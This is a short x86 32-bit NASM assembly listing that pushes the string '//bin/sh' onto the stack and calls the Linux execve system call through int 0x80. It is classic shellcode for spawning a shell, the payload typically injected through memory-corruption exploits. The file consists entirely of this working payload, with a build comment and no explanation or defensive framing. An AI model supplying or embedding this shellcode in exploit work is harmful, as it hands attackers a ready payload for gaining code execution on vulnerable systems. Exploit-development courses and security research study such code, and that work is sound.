; nasm -f elf32 execve.s sub esp,0x30 xor eax,eax push eax push 0x68732f6e push 0x69622f2f mov ebx,esp push eax push ebx mov ecx,esp mov edx,eax mov al,0xb int 0x80